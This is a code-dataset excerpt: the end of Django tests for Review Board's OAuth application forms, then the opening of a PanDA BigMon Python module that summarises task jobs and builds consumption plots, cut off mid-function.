self.assertEqual(application.client_secret, original_secret)
def test_grant_implicit_no_uris(self):
"""Testing ApplicationChangeForm.clean() with GRANT_IMPLICIT and no
URIs matches AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'', Application.GRANT_IMPLICIT, False)
def test_grant_implicit_uris(self):
"""Testing ApplicationChangeForm.clean() with GRANT_IMPLICIT and URIs
matches AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'http://example.com/', Application.GRANT_IMPLICIT, True)
def test_grant_authorization_code_no_uris(self):
"""Testing ApplicationChangeForm.clean() with
GRANT_AUTHORIZATION_CODE and no URIs matches
AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'', Application.GRANT_AUTHORIZATION_CODE, False)
def test_grant_authorization_code_uris(self):
"""Testing ApplicationChangeForm.clean() with
GRANT_AUTHORIZATION_CODE and URIS matches AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'http://example.com/', Application.GRANT_AUTHORIZATION_CODE, True)
def test_grant_password_no_uris(self):
"""Testing ApplicationChangeForm.clean() with GRANT_PASSWORD and no
URIs matches AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'', Application.GRANT_PASSWORD, True)
def test_grant_password_uris(self):
"""Testing ApplicationChangeForm.clean() with GRANT_PASSWORD and URIs
matches AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'http://example.com/', Application.GRANT_PASSWORD, True)
def test_grant_client_credentials_no_uris(self):
"""Testing ApplicationChangeForm.clean() with
GRANT_CLIENT_CREDENTIALS and no URIs matches
AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'', Application.GRANT_CLIENT_CREDENTIALS, True)
def test_grant_client_credentials_uris(self):
"""Testing ApplicationChangeForm.clean() with
GRANT_CLIENT_CREDENTIALS and no URIs matches
AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'', Application.GRANT_CLIENT_CREDENTIALS, True)
@add_fixtures(['test_site'])
def test_enable_disabled_for_security(self):
"""Testing ApplicationChangeForm will not enable an application
disabled for security
"""
local_site = LocalSite.objects.get(pk=1)
admin = User.objects.get(username='admin')
owner = User.objects.get(username='doc')
local_site.users.remove(owner)
application = self.create_oauth_application(user=admin,
local_site=local_site,
enabled=False,
original_user=owner)
self.assertTrue(application.is_disabled_for_security)
self.assertEqual(application.original_user, owner)
form = ApplicationChangeForm(
data=dict(model_to_dict(application),
enabled=True),
instance=application,
)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[ApplicationCreationForm.DISABLED_FOR_SECURITY_ERROR])
def _test_redirect_uri_grant_combination(self, redirect_uris, grant_type,
is_valid):
doc = User.objects.get(username='doc')
common_fields = {
'authorization_grant_type': grant_type,
'redirect_uris': redirect_uris,
}
application = self.create_oauth_application(user=doc)
# This should always succeed.
super(Application, application).clean()
form = ApplicationChangeForm(
data=dict(model_to_dict(application), **common_fields),
instance=application,
)
self.assertEqual(form.is_valid(), is_valid)
application = Application(user=doc, **common_fields)
# Ensure that the error cases of AbstractApplication.clean() matches
# our implementation.
if is_valid:
super(Application, application).clean()
else:
self.assertIn('redirect_uris', form.errors)
with self.assertRaises(ValidationError):
super(Application, application).clean()
class ApplicationCreationFormTests(TestCase):
"""Tests for the ApplicationCreationForm."""
fixtures = ['test_users']
def test_valid_client_id_and_secret(self):
"""Testing ApplicationCreationForm sets a valid client_id and
client_secret
"""
form = ApplicationCreationForm(data={
'authorization_grant_type': Application.GRANT_CLIENT_CREDENTIALS,
'client_id': 'foo',
'client_type': Application.CLIENT_PUBLIC,
'client_secret': 'bar',
'enabled': True,
'name': 'Test Application',
'redirect_uris': '',
'user': 1,
})
self.assertTrue(form.is_valid())
application = form.save()
self.assertNotEqual(application.client_id, form.data['client_id'])
self.assertNotEqual(application.client_secret,
form.data['client_secret'])
self.assertGreater(len(application.client_id), 0)
self.assertGreater(len(application.client_secret), 0)
class UserApplicationCreationFormTests(TestCase):
"""Tests for the UserApplicationCreationForm."""
fixtures = ['test_users']
def test_set_user(self):
"""Testing UserApplicationCreationForm cannot assign different user"""
user = User.objects.get(username='doc')
form = UserApplicationCreationForm(
user,
data={
'authorization_grant_type': Application.GRANT_IMPLICIT,
'client_type': Application.CLIENT_PUBLIC,
'name': 'test',
'redirect_uris': 'http://example.com',
'user': 2,
},
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.user, user)
@add_fixtures(['test_site'])
def test_assign_local_site(self):
"""Testing UserApplicationCreationForm with Local Site"""
user = User.objects.get(username='doc')
local_site = LocalSite.objects.get(name=self.local_site_name)
form = UserApplicationCreationForm(
user,
data={
'authorization_grant_type': Application.GRANT_IMPLICIT,
'client_type': Application.CLIENT_PUBLIC,
'name': 'test',
'redirect_uris': 'http://example.com',
'local_site': local_site.pk
},
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.local_site, local_site)
def test_assign_local_site_inacessible(self):
"""Testing UserApplicationCreationForm with an inaccessible Local Site
"""
local_site = LocalSite.objects.create(name='inacessible')
user = User.objects.get(username='doc')
form = UserApplicationCreationForm(
user,
data={
'authorization_grant_type': Application.GRANT_IMPLICIT,
'client_type': Application.CLIENT_PUBLIC,
'name': 'test',
'redirect_uris': 'http://example.com',
'local_site': local_site.pk
},
)
self.assertFalse(form.is_valid())
def test_set_extra_data(self):
"""Testing UserApplicationCreationForm cannot assign extra_data"""
user = User.objects.get(username='doc')
form = UserApplicationCreationForm(
user,
data={
'authorization_grant_type': Application.GRANT_IMPLICIT,
'client_type': Application.CLIENT_PUBLIC,
'name': 'test',
'redirect_uris': 'http://example.com',
'extra_data': 1,
},
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.extra_data, {})
def test_set_skip_authorization(self):
"""Testing UserApplicationCreationForm cannot assign
skip_authorization
"""
user = User.objects.get(username='doc')
form = UserApplicationCreationForm(
user,
data={
'authorization_grant_type': Application.GRANT_IMPLICIT,
'client_type': Application.CLIENT_PUBLIC,
'name': 'test',
'redirect_uris': 'http://example.com',
'extra_data': 1,
},
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.skip_authorization, False)
def test_set_client_id(self):
"""Testing UserApplicationCreationForm cannot assign client_id
"""
user = User.objects.get(username='doc')
form = UserApplicationCreationForm(
user,
data={
'authorization_grant_type': Application.GRANT_IMPLICIT,
'client_id': 'foo',
'client_type': Application.CLIENT_PUBLIC,
'name': 'test',
'redirect_uris': 'http://example.com',
},
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertNotEqual(application.client_id, 'foo')
self.assertNotEqual(len(application.client_id), 0)
def test_set_client_secret(self):
"""Testing UserApplicationCreationForm cannot assign client_secret
"""
user = User.objects.get(username='doc')
form = UserApplicationCreationForm(
user,
data={
'authorization_grant_type': Application.GRANT_IMPLICIT,
'client_secret': 'bar',
'client_type': Application.CLIENT_PUBLIC,
'name': 'test',
'redirect_uris': 'http://example.com',
},
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertNotEqual(application.client_secret, 'bar')
self.assertNotEqual(len(application.client_secret), 0)
class UserApplicationChangeFormTests(TestCase):
"""Tests for the UserApplicationChangeForm."""
fixtures = ['test_users']
def test_reassign_user(self):
"""Testing UserApplicationChangeForm cannot re-assign different user"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user)
form = UserApplicationChangeForm(
user,
data=dict(
model_to_dict(
instance=application,
fields=UserApplicationChangeForm.base_fields,
exclude=('client_id', 'client_secret'),
),
user=2,
),
instance=application,
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.user, user)
@add_fixtures(['test_site'])
def test_reassign_local_site(self):
"""Testing UserApplicationChangeForm cannot re-assign Local Site"""
user = User.objects.get(username='doc')
local_site = LocalSite.objects.get(pk=1)
application = self.create_oauth_application(user, local_site)
form = UserApplicationChangeForm(
user,
data=dict(
model_to_dict(
instance=application,
fields=UserApplicationChangeForm.base_fields,
exclude=('client_id', 'client_secret'),
),
local_site=2,
),
instance=application,
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.local_site, local_site)
def test_reassign_extra_data(self):
"""Testing UserApplicationChangeForm cannot re-assign extra_data"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user)
form = UserApplicationChangeForm(
user,
data=dict(
model_to_dict(
instance=application,
fields=UserApplicationChangeForm.base_fields,
exclude=('client_id', 'client_secret'),
),
extra_data=1,
),
instance=application,
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.extra_data, {})
def test_reassign_skip_authorization(self):
"""Testing UserApplicationChangeForm cannot re-assign
skip_authorization
"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user)
form = UserApplicationChangeForm(
user,
data=dict(
model_to_dict(
instance=application,
fields=UserApplicationChangeForm.base_fields,
exclude=('client_id', 'client_secret'),
),
skip_authorization=True,
),
instance=application,
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.skip_authorization, False)
class OAuthAdminTests(TestCase):
"""Tests for reviewboard.oauth.admin."""
fixtures = ['test_users']
def test_oauth_form_redirect(self):
"""Testing that a OAuth form can render on page, and saves data
correctly
"""
self.assertTrue(self.client.login(username='admin', password='admin'))
test_user = User.objects.latest('pk')
add_url = reverse('admin:oauth_application_add')
response = self.client.get(add_url)
self.assertEqual(response.status_code, 200)
response = self.client.post(
add_url,
{
'authorization_grant_type':
Application.GRANT_CLIENT_CREDENTIALS,
'client_type': Application.CLIENT_PUBLIC,
'enabled': True,
'name': 'Test Application',
'redirect_uris': '',
'user': test_user.pk,
})
application = Application.objects.latest('pk')
self.assertRedirects(
response,
reverse('admin:oauth_application_change', args=(application.pk,)))
|
mit
| 3,752,751,868,900,569,600 | 36.444934 | 79 | 0.588863 | false |
PanDAWMS/panda-bigmon-core
|
core/libs/task.py
|
1
|
58650
|
import logging
import time
import copy
import random
import json
import numpy as np
from datetime import datetime, timedelta
from django.db import connection
from django.db.models import Count, Sum
from core.common.models import JediEvents, JediDatasetContents, JediDatasets, JediTaskparams, JediDatasetLocality, JediTasks
from core.pandajob.models import Jobsactive4, Jobsarchived, Jobswaiting4, Jobsdefined4, Jobsarchived4, Jobsarchived_y2015
from core.libs.exlib import dictfetchall, insert_to_temp_table, drop_duplicates, add_job_category, get_job_walltime, \
job_states_count_by_param, get_tmp_table_name, parse_datetime, get_job_queuetime, convert_bytes
from core.libs.job import parse_jobmetrics
from core.libs.dropalgorithm import drop_job_retries, insert_dropped_jobs_to_tmp_table
from core.pandajob.utils import get_pandajob_models_by_year
import core.constants as const
from core.libs.elasticsearch import create_esatlas_connection
from elasticsearch_dsl import Search
from core.settings.local import defaultDatetimeFormat
_logger = logging.getLogger('bigpandamon')
def is_event_service_task(jeditaskid):
"""
Check if a task is EventService
:param jeditaskid: int
:return: eventservice: bool
"""
eventservice = False
query = {'jeditaskid': jeditaskid}
task = list(JediTasks.objects.filter(**query).values('eventservice'))
if len(task) > 0 and 'eventservice' in task[0] and task[0]['eventservice'] is not None and task[0]['eventservice'] == 1:
eventservice = True
return eventservice
def cleanTaskList(tasks, **kwargs):
add_datasets_info = False
add_datasets_locality = False
sortby = None
if 'add_datasets_info' in kwargs:
add_datasets_info = kwargs['add_datasets_info']
if 'add_datasets_locality' in kwargs:
add_datasets_locality = kwargs['add_datasets_locality']
add_datasets_info = True
if 'sortby' in kwargs:
sortby = kwargs['sortby']
for task in tasks:
if task['transpath']:
task['transpath'] = task['transpath'].split('/')[-1]
if task['statechangetime'] is None:
task['statechangetime'] = task['modificationtime']
if 'eventservice' in task:
if task['eventservice'] == 1:
task['eventservice'] = 'eventservice'
else:
task['eventservice'] = 'ordinary'
if 'reqid' in task and task['reqid'] and task['reqid'] < 100000 and task['reqid'] > 100 \
and task['reqid'] != 300 and 'tasktype' in task and not task['tasktype'].startswith('anal'):
task['deftreqid'] = task['reqid']
if 'corecount' in task and task['corecount'] is None:
task['corecount'] = 1
task['age'] = get_task_age(task)
if 'campaign' in task:
task['campaign_cut'] = ':'.join(task['campaign'].split(':')[1:]) if ':' in task['campaign'] else task['campaign']
# Get status of input processing as indicator of task progress if requested
if add_datasets_info:
N_MAX_IN_QUERY = 100
dvalues = ('jeditaskid', 'nfiles', 'nfilesfinished', 'nfilesfailed')
dsquery = {
'type__in': ['input', 'pseudo_input'],
'masterid__isnull': True,
}
extra = '(1=1)'
taskl = [t['jeditaskid'] for t in tasks if 'jeditaskid' in t]
if len(taskl) <= N_MAX_IN_QUERY:
dsquery['jeditaskid__in'] = taskl
else:
# Backend dependable
tk = insert_to_temp_table(taskl)
extra = "JEDITASKID in (SELECT ID FROM {} WHERE TRANSACTIONKEY={})".format(get_tmp_table_name(), tk)
dsets = JediDatasets.objects.filter(**dsquery).extra(where=[extra]).values(*dvalues)
dsinfo = {}
if len(dsets) > 0:
for ds in dsets:
taskid = ds['jeditaskid']
if taskid not in dsinfo:
dsinfo[taskid] = []
dsinfo[taskid].append(ds)
if add_datasets_locality:
input_dataset_rse = get_dataset_locality(taskl)
for task in tasks:
if 'totevrem' not in task:
task['totevrem'] = None
dstotals = {
'nfiles': 0,
'nfilesfinished': 0,
'nfilesfailed': 0,
'pctfinished': 0,
'pctfailed': 0,
}
if task['jeditaskid'] in dsinfo:
nfiles = 0
nfinished = 0
nfailed = 0
for ds in dsinfo[task['jeditaskid']]:
if int(ds['nfiles']) > 0:
nfiles += int(ds['nfiles'])
nfinished += int(ds['nfilesfinished'])
nfailed += int(ds['nfilesfailed'])
if nfiles > 0:
dstotals['nfiles'] = nfiles
dstotals['nfilesfinished'] = nfinished
dstotals['nfilesfailed'] = nfailed
dstotals['pctfinished'] = round(100. * nfinished / nfiles, 2)
dstotals['pctfailed'] = round(100. * nfailed / nfiles, 2)
task['dsinfo'] = dstotals
task.update(dstotals)
if sortby is not None:
if sortby == 'time-ascending':
tasks = sorted(tasks, key=lambda x: x['modificationtime'])
if sortby == 'time-descending':
tasks = sorted(tasks, key=lambda x: x['modificationtime'], reverse=True)
if sortby == 'statetime-descending':
tasks = sorted(tasks, key=lambda x: x['statechangetime'], reverse=True)
elif sortby == 'priority':
tasks = sorted(tasks, key=lambda x: x['taskpriority'], reverse=True)
elif sortby == 'nfiles':
tasks = sorted(tasks, key=lambda x: x['dsinfo']['nfiles'], reverse=True)
elif sortby == 'pctfinished':
tasks = sorted(tasks, key=lambda x: x['dsinfo']['pctfinished'], reverse=True)
elif sortby == 'pctfailed':
tasks = sorted(tasks, key=lambda x: x['dsinfo']['pctfailed'], reverse=True)
elif sortby == 'taskname':
tasks = sorted(tasks, key=lambda x: x['taskname'])
elif sortby == 'jeditaskid' or sortby == 'taskid':
tasks = sorted(tasks, key=lambda x: -x['jeditaskid'])
elif sortby == 'cloud':
tasks = sorted(tasks, key=lambda x: x['cloud'], reverse=True)
else:
tasks = sorted(tasks, key=lambda x: -x['jeditaskid'])
return tasks
def job_summary_for_task(query, extra="(1=1)", **kwargs):
"""An attempt to rewrite it moving dropping to db request level"""
start_time = time.time()
mode = 'nodrop'
if 'mode' in kwargs:
mode = kwargs['mode']
task_archive_flag = 1
if 'task_archive_flag' in kwargs and kwargs['task_archive_flag']:
task_archive_flag = kwargs['task_archive_flag']
jobs = []
# getting jobs from DB
jquery = copy.deepcopy(query)
jquery_notime = copy.deepcopy(query)
if 'modificationtime__castdate__range' in jquery_notime:
try:
del jquery_notime['modificationtime__castdate__range']
except:
_logger.warning('failed to remove modificationtime range from jquery')
values = ('actualcorecount', 'eventservice', 'modificationtime', 'jobsubstatus', 'pandaid', 'jobstatus',
'jeditaskid', 'processingtype', 'maxpss', 'starttime', 'endtime', 'computingsite', 'jobmetrics',
'nevents', 'hs06', 'hs06sec', 'cpuconsumptiontime', 'cpuconsumptionunit', 'transformation',
'jobsetid', 'specialhandling', 'creationtime')
if task_archive_flag >= 0:
jobs.extend(Jobsdefined4.objects.filter(**jquery_notime).extra(where=[extra]).values(*values))
jobs.extend(Jobswaiting4.objects.filter(**jquery_notime).extra(where=[extra]).values(*values))
jobs.extend(Jobsactive4.objects.filter(**jquery_notime).extra(where=[extra]).values(*values))
jobs.extend(Jobsarchived4.objects.filter(**jquery_notime).extra(where=[extra]).values(*values))
jobs.extend(Jobsarchived.objects.filter(**jquery_notime).extra(where=[extra]).values(*values))
_logger.info("Got jobs from ADCR: {} sec".format(time.time() - start_time))
if task_archive_flag <= 0:
# get list of jobsarchived models
jobsarchived_models = get_pandajob_models_by_year(jquery['modificationtime__castdate__range'])
if len(jobsarchived_models) > 0:
for jam in jobsarchived_models:
jobs.extend(jam.objects.filter(**jquery).extra(where=[extra]).values(*values))
_logger.info("Got jobs from ATLARC: {} sec".format(time.time() - start_time))
_logger.info("Got jobs: {} sec".format(time.time() - start_time))
# drop duplicate jobs
jobs = drop_duplicates(jobs, id='pandaid')
_logger.info("Dropped jobs: {} sec".format(time.time() - start_time))
if mode == 'drop':
jobs, dj, dmj = drop_job_retries(jobs, jquery['jeditaskid'], is_return_dropped_jobs=False)
_logger.info("Dropped job retries (drop mode): {} sec".format(time.time() - start_time))
# determine jobs category (build, run or merge)
jobs = add_job_category(jobs)
_logger.info("Determine job category: {} sec".format(time.time() - start_time))
# parse job metrics and add to job dict
jobs = parse_jobmetrics(jobs)
_logger.info("Parsed and added job metrics: {} sec".format(time.time() - start_time))
# prepare data for job consumption plots
plots_list = job_consumption_plots(jobs)
_logger.info("Prepared job consumption plots: {} sec".format(time.time() - start_time))
# jobs states aggregation by category
job_summary_list = job_states_count_by_param(jobs, param='category')
job_summary_list_ordered = []
job_category_order = ['build', 'run', 'merge']
for jc in job_category_order:
for jcs in job_summary_list:
if jc == jcs['value']:
job_summary_list_ordered.append(jcs)
_logger.info("Got summary by job category: {} sec".format(time.time() - start_time))
# find scouts
scouts = get_task_scouts(jobs)
_logger.info("Got scouts: {} sec".format(time.time() - start_time))
# calculate metrics
metrics = calculate_metrics(jobs, metrics_names=[
'resimevents_avg', 'resimeventspernevents_avgpercent', 'resimevents_sum'])
return plots_list, job_summary_list_ordered, scouts, metrics
def get_task_scouts(jobs):
"""
Get PanDAIDs of selected scouting metrics for a task
:param jobs: list of dicts
:return: dict:
"""
scouts_dict = {}
scout_types = ['cpuTime', 'walltime', 'ramCount', 'ioIntensity', 'outDiskCount']
for jst in scout_types:
scouts_dict[jst] = []
for job in jobs:
for jst in scout_types:
if 'jobmetrics' in job and 'scout=' in job['jobmetrics'] and jst in job['jobmetrics'][job['jobmetrics'].index('scout='):]:
scouts_dict[jst].append(job['pandaid'])
# remove scout type if no scouts
st_to_remove = []
for jst, jstd in scouts_dict.items():
if len(jstd) == 0:
st_to_remove.append(jst)
for st in st_to_remove:
if st in scouts_dict:
del scouts_dict[st]
return scouts_dict
def calculate_metrics(jobs, metrics_names):
"""
Calculate job metrics for a task
:param jobs:
:param metrics_names:
:return:
"""
metrics_def_dict = {mn: {'metric': mn.split('_')[0], 'agg': mn.split('_')[1], 'data': [], 'value': -1} for mn in metrics_names}
for job in jobs:
if job['category'] == 'run' and job['jobstatus'] == 'finished':
for mn, mdata in metrics_def_dict.items():
if 'per' in mdata['metric']:
if mdata['metric'].split('per')[0] in job and mdata['metric'].split('per')[1] in job and job[mdata['metric'].split('per')[1]] > 0:
mdata['data'].append(job[mdata['metric'].split('per')[0]]/(1.0*job[mdata['metric'].split('per')[1]]))
elif mdata['metric'] in job and job[mdata['metric']]:
mdata['data'].append(job[mdata['metric']])
for mn, mdata in metrics_def_dict.items():
if 'avg' in mdata['agg']:
mdata['value'] = sum(mdata['data'])/(1.0*len(mdata['data'])) if len(mdata['data']) > 0 else -1
if 'sum' in mdata['agg']:
mdata['value'] = sum(mdata['data'])
metrics = {}
for mn, mdata in metrics_def_dict.items():
if mdata['value'] > 0:
if 'percent' in mdata['agg']:
metrics[mn] = round(mdata['value'] * 100.0, 2)
else:
metrics[mn] = round(mdata['value'], 2)
return metrics
def job_consumption_plots(jobs):
start_time = time.time()
plots_dict = {}
plot_details = {
'nevents_sum_finished': {
'type': 'pie', 'group_by': 'computingsite',
'title': 'Number of events', 'xlabel': 'N events', 'ylabel': 'N jobs'},
'nevents_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Number of events', 'xlabel': 'N events', 'ylabel': 'N jobs'},
'resimevents_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Resim events (finished jobs)', 'xlabel': 'N resim events', 'ylabel': 'N jobs'},
'maxpss_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Max PSS (finished jobs)', 'xlabel': 'MaxPSS, MB', 'ylabel': 'N jobs'},
'maxpsspercore_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Max PSS/core (finished jobs)', 'xlabel': 'MaxPSS per core, MB', 'ylabel': 'N jobs'},
'walltime_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Walltime (finished jobs)', 'xlabel': 'Walltime, s', 'ylabel': 'N jobs'},
'walltimeperevent_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Walltime/event (finished jobs)', 'xlabel': 'Walltime per event, s', 'ylabel': 'N jobs'},
'queuetime_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Time to start (finished jobs)', 'xlabel': 'Time to start, s', 'ylabel': 'N jobs'},
'hs06s_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'HS06s (finished jobs)', 'xlabel': 'HS06s', 'ylabel': 'N jobs'},
'cputime_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'CPU time (finished jobs)', 'xlabel': 'CPU time, s', 'ylabel': 'N jobs'},
'cputimeperevent_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'CPU time/event (finished jobs)', 'xlabel': 'CPU time, s', 'ylabel': 'N jobs'},
'dbtime_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'DB time (finished jobs)', 'xlabel': 'DB time, s', 'ylabel': 'N jobs'},
'dbdata_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'DB data (finished jobs)', 'xlabel': 'DB data, MB', 'ylabel': 'N jobs'},
'workdirsize_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Workdir size (finished jobs)', 'xlabel': 'Workdir, MB', 'ylabel': 'N jobs'},
'leak_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Memory leak (finished jobs)', 'xlabel': 'Memory leak, B/s', 'ylabel': 'N jobs'},
'nprocesses_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'N processes (finished jobs)', 'xlabel': 'N proceeses', 'ylabel': 'N jobs'},
'maxpss_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Maximum PSS (failed jobs)', 'xlabel': 'MaxPSS, MB', 'ylabel': 'N jobs'},
'maxpsspercore_failed': {
'type': 'stack_bar', 'group_by': 'computingsite', 'title': 'Max PSS/core (failed jobs)',
'xlabel': 'MaxPSS per core, MB', 'ylabel': 'N jobs'},
'walltime_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Walltime (failed jobs)', 'xlabel': 'walltime, s', 'ylabel': 'N jobs'},
'queuetime_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Time to start (failed jobs)', 'xlabel': 'Time to start, s', 'ylabel': 'N jobs'},
'walltimeperevent_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Walltime/event (failed jobs)', 'xlabel': 'Walltime per event, s', 'ylabel': 'N jobs'},
'hs06s_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'HS06s (failed jobs)', 'xlabel': 'HS06s', 'ylabel': 'N jobs'},
'cputime_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'CPU time (failed jobs)', 'xlabel': 'CPU time, s', 'ylabel': 'N jobs'},
'cputimeperevent_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'CPU time/event (failed jobs)', 'xlabel': 'CPU time, s', 'ylabel': 'N jobs'},
'dbtime_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'DB time (failed jobs)', 'xlabel': 'DB time, s', 'ylabel': 'N jobs'},
'dbdata_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'DB data (failed jobs)', 'xlabel': 'DB data, MB', 'ylabel': 'N jobs'},
'workdirsize_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Workdir size (failed jobs)', 'xlabel': 'Workdir, MB', 'ylabel': 'N jobs'},
'leak_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Memory leak (failed jobs)', 'xlabel': 'Memory leak, B/s', 'ylabel': 'N jobs'},
'nprocesses_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'N processes (failed jobs)', 'xlabel': 'N proceeses', 'ylabel': 'N jobs'},
'walltime_bycpuunit_finished': {
'type': 'stack_bar', 'group_by': 'cpuconsumptionunit',
'title': 'Walltime (finished jobs)', 'xlabel': 'Walltime, s', 'ylabel': 'N jobs'},
'walltime_bycpuunit_failed': {
'type': 'stack_bar', 'group_by': 'cpuconsumptionunit',
'title': 'Walltime (failed jobs)', 'xlabel': 'Walltime, s', 'ylabel': 'N jobs'},
}
plots_data = {}
for pname, pd in plot_details.items():
if pd['type'] not in plots_data:
plots_data[pd['type']] = {}
plots_data[pd['type']][pname] = {
'build': {},
'run': {},
'merge': {}
}
MULTIPLIERS = {
"SEC": 1.0,
"MIN": 60.0,
"HOUR": 60.0 * 60.0,
"MB": 1024.0,
"GB": 1024.0 * 1024.0,
}
# prepare data for plots
for job in jobs:
if job['actualcorecount'] is None:
job['actualcorecount'] = 1
if 'duration' not in job:
job['duration'] = get_job_walltime(job)
if 'queuetime' not in job:
job['queuetime'] = get_job_queuetime(job)
if job['jobstatus'] in ('finished', 'failed'):
for pname, pd in plot_details.items():
if pd['group_by'] in job and job[pd['group_by']] not in plots_data[pd['type']][pname][job['category']]:
plots_data[pd['type']][pname][job['category']][job[pd['group_by']]] = []
else:
continue
if 'nevents' in job and job['nevents'] > 0 and job['jobstatus'] == 'finished':
plots_data['stack_bar']['nevents' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(job['nevents'])
plots_data['pie']['nevents_sum_finished'][job['category']][job['computingsite']].append(job['nevents'])
if 'maxpss' in job and job['maxpss'] is not None and job['maxpss'] >= 0:
plots_data['stack_bar']['maxpss' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['maxpss'] / MULTIPLIERS['MB']
)
if job['actualcorecount'] and job['actualcorecount'] > 0:
plots_data['stack_bar']['maxpsspercore' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['maxpss'] / MULTIPLIERS['MB'] / job['actualcorecount']
)
if 'hs06sec' in job and job['hs06sec']:
plots_data['stack_bar']['hs06s' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(job['hs06sec'])
if 'queuetime' in job and job['queuetime']:
plots_data['stack_bar']['queuetime' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(job['queuetime'])
if 'duration' in job and job['duration']:
plots_data['stack_bar']['walltime' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(job['duration'])
if 'walltimeperevent' in job:
plots_data['stack_bar']['walltimeperevent' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['walltimeperevent']
)
elif 'nevents' in job and job['nevents'] is not None and job['nevents'] > 0:
plots_data['stack_bar']['walltimeperevent' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['duration'] / (job['nevents'] * 1.0)
)
if 'cpuconsumptionunit' in job and job['cpuconsumptionunit']:
plots_data['stack_bar']['walltime_bycpuunit' + '_' + job['jobstatus']][job['category']][job['cpuconsumptionunit']].append(job['duration'])
if 'cpuconsumptiontime' in job and job['cpuconsumptiontime'] is not None and job['cpuconsumptiontime'] > 0:
plots_data['stack_bar']['cputime' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['cpuconsumptiontime']
)
if 'nevents' in job and job['nevents'] is not None and job['nevents'] > 0:
plots_data['stack_bar']['cputimeperevent' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['cpuconsumptiontime'] / (job['nevents'] * 1.0)
)
if 'leak' in job and job['leak'] is not None:
plots_data['stack_bar']['leak' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['leak']
)
if 'nprocesses' in job and job['nprocesses'] is not None and job['nprocesses'] > 0:
plots_data['stack_bar']['nprocesses' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['nprocesses']
)
if 'workdirsize' in job and job['workdirsize'] is not None and job['workdirsize'] > 0:
plots_data['stack_bar']['workdirsize' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
convert_bytes(job['workdirsize'], output_unit='MB')
)
if 'dbtime' in job and job['dbtime'] is not None and job['dbtime'] > 0:
plots_data['stack_bar']['dbtime' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['dbtime']
)
if 'dbdata' in job and job['dbdata'] is not None and job['dbdata'] > 0:
plots_data['stack_bar']['dbdata' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
convert_bytes(job['dbdata'], output_unit='MB')
)
if 'resimevents' in job and job['resimevents'] and job['jobstatus'] == 'finished':
plots_data['stack_bar']['resimevents' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['resimevents'])
_logger.info("prepare plots data: {} sec".format(time.time() - start_time))
# remove empty categories
cat_to_remove = {'build': True, 'run': True, 'merge': True}
for pt, td in plots_data.items():
for pm, pd in td.items():
for cat, cd in pd.items():
if len(cd) > 0:
cat_to_remove[cat] = False
for pt, td in plots_data.items():
for pm, pd in td.items():
